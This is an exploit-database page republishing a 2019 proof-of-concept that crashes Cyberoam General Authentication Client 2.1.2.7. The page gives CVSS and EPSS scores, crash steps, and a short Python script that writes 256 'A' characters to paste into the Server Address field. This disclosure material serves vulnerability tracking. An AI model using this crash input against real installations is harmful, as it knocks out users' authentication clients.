Advertisement






Cyberoam General Authentication Client 2.1.2.7 Server Address Denial of Service (PoC)

CVE Category Price Severity
CWE-401 Unknown High
Author Risk Exploitation Type Date
Unknown High Remote 2019-05-30
CPE
cpe:cpe:/a:cyberoam:general_authentication_client:2.1.2.7
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 0.02163 0.45478

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019050307

Below is a copy:

Cyberoam General Authentication Client 2.1.2.7 Server Address Denial of Service (PoC)
#Exploit Title: Cyberoam General Authentication Client 2.1.2.7 - Denial of Service (PoC)
#Discovery by: Victor Mondragn
#Discovery Date: 2019-05-23
#Vendor Homepage: https://www.cyberoam.com
#Software Link: https://download.cyberoam.com/solution/optionals/i18n/Cyberoam%20General%20Authentication%20Client%202.1.2.7.zip
#Tested Version: 2.1.2.7
#Tested on: Windows 7 Service Pack 1 x64

#Steps to produce the crash:
#1.- Run python code: cgac_2.1.2.7.py
#2.- Open cgac_2.1.2.7.txt and copy content to clipboard
#3.- Open Cyberoam General Authentication Client
#4.- In "Server Address" field paste Clipboard
#5.- Click on "Test"
#6.- Crashed! 

cod = "\x41" * 256

f = open('cgac_2.1.2.7.txt', 'w')
f.write(cod)
f.close()

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.